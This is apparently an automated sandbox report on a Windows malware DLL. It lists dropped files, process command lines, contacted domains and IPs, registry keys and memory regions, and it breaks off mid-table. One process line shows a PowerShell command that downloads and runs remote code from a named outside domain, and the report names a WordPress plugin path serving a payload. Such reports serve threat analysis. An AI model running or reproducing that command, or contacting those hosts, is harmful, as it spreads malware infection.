Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll
|
PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_93561547f9ab75e2d2d7d784e3e2763e56fb4_ea019e54_3ca5399a-1b69-4c7a-8d8c-7161ee13ae5d\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_93561547f9ab75e2d2d7d784e3e2763e56fb4_ea019e54_6fc4d428-48e4-4399-bb71-eef6d35e2dc1\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_93561547f9ab75e2d2d7d784e3e2763e56fb4_ea019e54_aac994ee-ce0b-48fb-8a74-40af1f4af919\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9897.tmp.dmp
|
Mini DuMP crash report, 14 streams, Wed May 22 20:08:35 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9915.tmp.dmp
|
Mini DuMP crash report, 14 streams, Wed May 22 20:08:35 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9925.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER99A3.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER99B2.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A02.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB036.tmp.dmp
|
Mini DuMP crash report, 14 streams, Wed May 22 20:08:41 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB22B.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB27A.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\Public\example.hta
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\d[1].txt
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1db0znj.hx4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgyfop5q.qvp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5og1mcu.cil.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qg2kzatk.gjz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 12 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll,hash
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",#1
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll,xlAutoOpen
|
|
|
|
C:\Windows\SysWOW64\mshta.exe
|
"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
mshta
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",hash
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",xlAutoOpen
|
|
|
|
C:\Windows\SysWOW64\mshta.exe
|
"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
mshta
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
|
|
|
|
C:\Windows\System32\loaddll64.exe
|
loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",#1
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 4024 -s 424
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 5836 -s 416
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 7600 -s 416
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 7 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt5
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt4
|
unknown
|
||
|
http://iapartmentlistings.com/tykhwuxk
|
91.222.173.38
|
||
|
http://upx.sf.net
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt
|
194.124.213.167
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt3
|
unknown
|
||
|
https://www.siguefutbol.com/
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtK
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen3a413cab4a1b175a1b32871e89
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
iapartmentlistings.com
|
91.222.173.38
|
|
|
|
siguefutbol.com
|
194.124.213.167
|
||
|
www.siguefutbol.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
91.222.173.38
|
iapartmentlistings.com
|
Ukraine
|
|
|
|
194.124.213.167
|
siguefutbol.com
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProgramId
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
FileId
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LongPathHash
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Name
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
OriginalFileName
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Publisher
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Version
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinFileVersion
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinaryType
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProductName
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProductVersion
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LinkDate
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinProductVersion
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Size
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Language
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
IsOsComponent
|
||
|
\REGISTRY\A\{d944f1e6-3ca9-37df-d3d7-0a02f4dd20d7}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Usn
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\SysWOW64\mshta.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\SysWOW64\mshta.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 28 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
29419630000
|
heap
|
page read and write
|
||
|
3182000
|
heap
|
page read and write
|
||
|
638B000
|
heap
|
page read and write
|
||
|
A4CE000
|
stack
|
page read and write
|
||
|
A3FE000
|
heap
|
page read and write
|
||
|
7FF8BFAB1000
|
unkown
|
page execute read
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
A690000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
A470000
|
heap
|
page read and write
|
||
|
A126000
|
heap
|
page read and write
|
||
|
638C000
|
heap
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
1F42663D000
|
heap
|
page read and write
|
||
|
A3FE000
|
heap
|
page read and write
|
||
|
1F4265D8000
|
heap
|
page read and write
|
||
|
DC46ADC000
|
stack
|
page read and write
|
||
|
310E000
|
heap
|
page read and write
|
||
|
6CDFFE000
|
stack
|
page read and write
|
||
|
1800E090000
|
heap
|
page read and write
|
||
|
3178000
|
heap
|
page read and write
|
||
|
64CC000
|
heap
|
page read and write
|
||
|
2F61000
|
heap
|
page read and write
|
||
|
B43D9FD000
|
stack
|
page read and write
|
||
|
2F9E000
|
heap
|
page read and write
|
||
|
7FF8BFAB0000
|
unkown
|
page readonly
|
||
|
A3C0000
|
heap
|
page read and write
|
||
|
317B000
|
heap
|
page read and write
|
||
|
6CDE7F000
|
stack
|
page read and write
|
||
|
312A000
|
heap
|
page read and write
|
||
|
64D9000
|
heap
|
page read and write
|
||
|
1E645C32000
|
heap
|
page read and write
|
||
|
B0E000
|
stack
|
page read and write
|
||
|
1E6479B0000
|
remote allocation
|
page read and write
|
||
|
1E6479B0000
|
remote allocation
|
page read and write
|
||
|
2F4A000
|
heap
|
page read and write
|
||
|
64B6000
|
heap
|
page read and write
|
||
|
32D6000
|
heap
|
page read and write
|
||
|
2F7E000
|
heap
|
page read and write
|
||
|
29C61090000
|
heap
|
page read and write
|
||
|
64DF000
|
heap
|
page read and write
|
||
|
31A6000
|
heap
|
page read and write
|
||
|
315A000
|
heap
|
page read and write
|
||
|
B10000
|
heap
|
page read and write
|
||
|
2FB9000
|
heap
|
page read and write
|
||
|
A3FE000
|
heap
|
page read and write
|
||
|
7FF8BFAB4000
|
unkown
|
page readonly
|
||
|
6CDB36000
|
stack
|
page read and write
|
||
|
318C000
|
heap
|
page read and write
|
||
|
6393000
|
heap
|
page read and write
|
||
|
319E000
|
heap
|
page read and write
|
||
|
3167000
|
heap
|
page read and write
|
||
|
2F7E000
|
heap
|
page read and write
|
||
|
6CE17E000
|
stack
|
page read and write
|
||
|
2F31000
|
heap
|
page read and write
|
||
|
1E645B70000
|
heap
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
2F5A000
|
heap
|
page read and write
|
||
|
4F26000
|
heap
|
page read and write
|
||
|
2F08000
|
heap
|
page read and write
|
||
|
7FF8BFAB0000
|
unkown
|
page readonly
|
||
|
2F0D50E000
|
stack
|
page read and write
|
||
|
2FA9000
|
heap
|
page read and write
|
||
|
1800DE10000
|
heap
|
page read and write
|
||
|
3158000
|
heap
|
page read and write
|
||
|
1E6479C0000
|
heap
|
page read and write
|
||
|
2BE9000
|
stack
|
page read and write
|
||
|
32DF000
|
heap
|
page read and write
|
||
|
2FE7000
|
heap
|
page read and write
|
||
|
639A000
|
heap
|
page read and write
|
||
|
32CE000
|
stack
|
page read and write
|
||
|
3420000
|
heap
|
page read and write
|
||
|
1800DE40000
|
heap
|
page read and write
|
||
|
2FCE000
|
heap
|
page read and write
|
||
|
2FB8000
|
heap
|
page read and write
|
||
|
58EE000
|
stack
|
page read and write
|
||
|
DC46BDF000
|
stack
|
page read and write
|
||
|
6CE1F7000
|
stack
|
page read and write
|
||
|
B43DCFB000
|
stack
|
page read and write
|
||
|
638B000
|
heap
|
page read and write
|
||
|
1800E095000
|
heap
|
page read and write
|
||
|
311B000
|
heap
|
page read and write
|
||
|
1E647490000
|
heap
|
page read and write
|
||
|
6CE0FE000
|
stack
|
page read and write
|
||
|
1E645B95000
|
heap
|
page read and write
|
||
|
335B79E000
|
stack
|
page read and write
|
||
|
2F1E000
|
heap
|
page read and write
|
||
|
B43D596000
|
stack
|
page read and write
|
||
|
29419730000
|
heap
|
page read and write
|
||
|
31A3000
|
heap
|
page read and write
|
||
|
316F000
|
heap
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
A3CA000
|
heap
|
page read and write
|
||
|
2941953D000
|
heap
|
page read and write
|
||
|
50D3000
|
heap
|
page read and write
|
||
|
3112000
|
heap
|
page read and write
|
||
|
3149000
|
heap
|
page read and write
|
||
|
6376000
|
heap
|
page read and write
|
||
|
3183000
|
heap
|
page read and write
|
||
|
315A000
|
heap
|
page read and write
|
||
|
1F4266A3000
|
heap
|
page read and write
|
||
|
52B0000
|
heap
|
page read and write
|
||
|
335B71F000
|
stack
|
page read and write
|
||
|
A99B000
|
stack
|
page read and write
|
||
|
2FCE000
|
heap
|
page read and write
|
||
|
646E000
|
stack
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
1E645C2D000
|
heap
|
page read and write
|
||
|
3174000
|
heap
|
page read and write
|
||
|
1F426895000
|
heap
|
page read and write
|
||
|
2FF8000
|
heap
|
page read and write
|
||
|
1E645BC8000
|
heap
|
page read and write
|
||
|
31B2000
|
heap
|
page read and write
|
||
|
2F94000
|
heap
|
page read and write
|
||
|
64D3000
|
heap
|
page read and write
|
||
|
2F31000
|
heap
|
page read and write
|
||
|
B43DBFE000
|
stack
|
page read and write
|
||
|
3181000
|
heap
|
page read and write
|
||
|
639A000
|
heap
|
page read and write
|
||
|
31AA000
|
heap
|
page read and write
|
||
|
AE60CFF000
|
stack
|
page read and write
|
||
|
A3C1000
|
heap
|
page read and write
|
||
|
31B8000
|
heap
|
page read and write
|
||
|
2FD5000
|
heap
|
page read and write
|
||
|
A33F000
|
stack
|
page read and write
|
||
|
2F41000
|
heap
|
page read and write
|
||
|
6490000
|
heap
|
page read and write
|
||
|
7FF8BFAB0000
|
unkown
|
page readonly
|
||
|
2FAD000
|
heap
|
page read and write
|
||
|
3101000
|
heap
|
page read and write
|
||
|
AE60BFF000
|
stack
|
page read and write
|
||
|
3035000
|
heap
|
page read and write
|
||
|
307E000
|
stack
|
page read and write
|
||
|
A125000
|
heap
|
page read and write
|
||
|
2FA9000
|
heap
|
page read and write
|
||
|
64D3000
|
heap
|
page read and write
|
||
|
2F7E000
|
heap
|
page read and write
|
||
|
317E000
|
heap
|
page read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
29419730000
|
heap
|
page read and write
|
||
|
6351000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
29419530000
|
heap
|
page read and write
|
||
|
2EF7000
|
stack
|
page read and write
|
||
|
A3D4000
|
trusted library allocation
|
page read and write
|
||
|
29419539000
|
heap
|
page read and write
|
||
|
319F000
|
heap
|
page read and write
|
||
|
B43D87E000
|
stack
|
page read and write
|
||
|
318D000
|
heap
|
page read and write
|
||
|
A59000
|
stack
|
page read and write
|
||
|
A3CB000
|
heap
|
page read and write
|
||
|
29C60E78000
|
heap
|
page read and write
|
||
|
3133000
|
heap
|
page read and write
|
||
|
29419760000
|
heap
|
page read and write
|
||
|
63A0000
|
heap
|
page read and write
|
||
|
3125000
|
heap
|
page read and write
|
||
|
2FB8000
|
heap
|
page read and write
|
||
|
2F9F000
|
heap
|
page read and write
|
||
|
31BF000
|
heap
|
page read and write
|
||
|
2FC8000
|
heap
|
page read and write
|
||
|
31A6000
|
heap
|
page read and write
|
||
|
4F20000
|
heap
|
page read and write
|
||
|
1E645A70000
|
heap
|
page read and write
|
||
|
1E645BC0000
|
heap
|
page read and write
|
||
|
31BE000
|
heap
|
page read and write
|
||
|
1E645C10000
|
heap
|
page read and write
|
||
|
3080000
|
heap
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
2FE3000
|
heap
|
page read and write
|
||
|
5280000
|
heap
|
page read and write
|
||
|
7FF8BFAB4000
|
unkown
|
page readonly
|
||
|
64B6000
|
heap
|
page read and write
|
||
|
29C61095000
|
heap
|
page read and write
|
||
|
2FF5000
|
heap
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
2BB0000
|
trusted library allocation
|
page read and write
|
||
|
64B8000
|
heap
|
page read and write
|
||
|
3197000
|
heap
|
page read and write
|
||
|
5170000
|
heap
|
page read and write
|
||
|
2F8B000
|
heap
|
page read and write
|
||
|
64E0000
|
heap
|
page read and write
|
||
|
B43DAFE000
|
stack
|
page read and write
|
||
|
64CA000
|
heap
|
page read and write
|
||
|
3176000
|
heap
|
page read and write
|
||
|
2FA9000
|
heap
|
page read and write
|
||
|
6CDEFE000
|
stack
|
page read and write
|
||
|
6CE27B000
|
stack
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
2FD8000
|
heap
|
page read and write
|
||
|
3085000
|
heap
|
page read and write
|
||
|
3456000
|
heap
|
page read and write
|
||
|
4F2F000
|
heap
|
page read and write
|
||
|
345A000
|
heap
|
page read and write
|
||
|
A23E000
|
stack
|
page read and write
|
||
|
2F0D58F000
|
stack
|
page read and write
|
||
|
312A000
|
heap
|
page read and write
|
||
|
AE60AFB000
|
stack
|
page read and write
|
||
|
2FB8000
|
heap
|
page read and write
|
||
|
2FF9000
|
heap
|
page read and write
|
||
|
57AC000
|
stack
|
page read and write
|
||
|
2941AF80000
|
heap
|
page read and write
|
||
|
57B0000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
2FCE000
|
heap
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
2F91000
|
heap
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
33D0000
|
trusted library allocation
|
page read and write
|
||
|
A153000
|
heap
|
page read and write
|
||
|
31BC000
|
heap
|
page read and write
|
||
|
2FB4000
|
heap
|
page read and write
|
||
|
64D3000
|
heap
|
page read and write
|
||
|
2F62000
|
heap
|
page read and write
|
||
|
64B8000
|
heap
|
page read and write
|
||
|
3133000
|
heap
|
page read and write
|
||
|
3158000
|
heap
|
page read and write
|
||
|
5A2F000
|
stack
|
page read and write
|
||
|
639A000
|
heap
|
page read and write
|
||
|
29419710000
|
heap
|
page read and write
|
||
|
A114000
|
heap
|
page read and write
|
||
|
64D9000
|
heap
|
page read and write
|
||
|
50D0000
|
heap
|
page read and write
|
||
|
317B000
|
heap
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
1B8C8D70000
|
heap
|
page read and write
|
||
|
3149000
|
heap
|
page read and write
|
||
|
7FF8BFAB1000
|
unkown
|
page execute read
|
||
|
A3D0000
|
trusted library allocation
|
page read and write
|
||
|
3174000
|
heap
|
page read and write
|
||
|
4F24000
|
heap
|
page read and write
|
||
|
636E000
|
stack
|
page read and write
|
||
|
64D3000
|
heap
|
page read and write
|
||
|
64D0000
|
heap
|
page read and write
|
||
|
638B000
|
heap
|
page read and write
|
||
|
316F000
|
heap
|
page read and write
|
||
|
317E000
|
heap
|
page read and write
|
||
|
A12F000
|
heap
|
page read and write
|
||
|
5083000
|
heap
|
page read and write
|
||
|
30D0000
|
heap
|
page read and write
|
||
|
7FF8BFAB9000
|
unkown
|
page read and write
|
||
|
319E000
|
heap
|
page read and write
|
||
|
2FED000
|
heap
|
page read and write
|
||
|
1E6479E1000
|
heap
|
page read and write
|
||
|
AC0000
|
heap
|
page read and write
|
||
|
9F62000
|
trusted library allocation
|
page read and write
|
||
|
2FB4000
|
heap
|
page read and write
|
||
|
1B8C7700000
|
heap
|
page read and write
|
||
|
2FC8000
|
heap
|
page read and write
|
||
|
1800F9E0000
|
heap
|
page read and write
|
||
|
57EB000
|
stack
|
page read and write
|
||
|
6393000
|
heap
|
page read and write
|
||
|
318D000
|
heap
|
page read and write
|
||
|
1E645CBA000
|
heap
|
page read and write
|
||
|
2FE3000
|
heap
|
page read and write
|
||
|
29C60E00000
|
heap
|
page read and write
|
||
|
1E645C50000
|
heap
|
page read and write
|
||
|
6391000
|
heap
|
page read and write
|
||
|
6393000
|
heap
|
page read and write
|
||
|
1B8C7705000
|
heap
|
page read and write
|
||
|
312A000
|
heap
|
page read and write
|
||
|
31A5000
|
heap
|
page read and write
|
||
|
2F9B000
|
heap
|
page read and write
|
||
|
2FAD000
|
heap
|
page read and write
|
||
|
31A2000
|
heap
|
page read and write
|
||
|
6CDBBF000
|
stack
|
page read and write
|
||
|
64D3000
|
heap
|
page read and write
|
||
|
A61C000
|
stack
|
page read and write
|
||
|
2FD7000
|
heap
|
page read and write
|
||
|
53A4000
|
heap
|
page read and write
|
||
|
2FD8000
|
heap
|
page read and write
|
||
|
3133000
|
heap
|
page read and write
|
||
|
2FF5000
|
heap
|
page read and write
|
||
|
319B000
|
heap
|
page read and write
|
||
|
2FC8000
|
heap
|
page read and write
|
||
|
3149000
|
heap
|
page read and write
|
||
|
50B0000
|
heap
|
page read and write
|
||
|
31C3000
|
heap
|
page read and write
|
||
|
2EF7000
|
stack
|
page read and write
|
||
|
31B6000
|
heap
|
page read and write
|
||
|
317B000
|
heap
|
page read and write
|
||
|
6393000
|
heap
|
page read and write
|
||
|
6378000
|
heap
|
page read and write
|
||
|
2F9A000
|
heap
|
page read and write
|
||
|
29C60E70000
|
heap
|
page read and write
|
||
|
2FD3000
|
heap
|
page read and write
|
||
|
1F4266D0000
|
heap
|
page read and write
|
||
|
2FEB000
|
heap
|
page read and write
|
||
|
1F426683000
|
heap
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
B43D97E000
|
stack
|
page read and write
|
||
|
1E645B90000
|
heap
|
page read and write
|
||
|
2FB4000
|
heap
|
page read and write
|
||
|
A390000
|
heap
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
2F5A000
|
heap
|
page read and write
|
||
|
2F4C000
|
heap
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
7FF8BFAB4000
|
unkown
|
page readonly
|
||
|
2FC5000
|
heap
|
page read and write
|
||
|
1B8C7360000
|
heap
|
page read and write
|
||
|
2FF2000
|
heap
|
page read and write
|
||
|
53A0000
|
heap
|
page read and write
|
||
|
30EE000
|
heap
|
page read and write
|
||
|
2F4D000
|
heap
|
page read and write
|
||
|
2FC8000
|
heap
|
page read and write
|
||
|
2F9E000
|
heap
|
page read and write
|
||
|
335F000
|
stack
|
page read and write
|
||
|
6CE07E000
|
stack
|
page read and write
|
||
|
1B8C736F000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
64CC000
|
heap
|
page read and write
|
||
|
6CDF7D000
|
stack
|
page read and write
|
||
|
A710000
|
heap
|
page read and write
|
||
|
A3B2000
|
heap
|
page read and write
|
||
|
7FF8BFAB9000
|
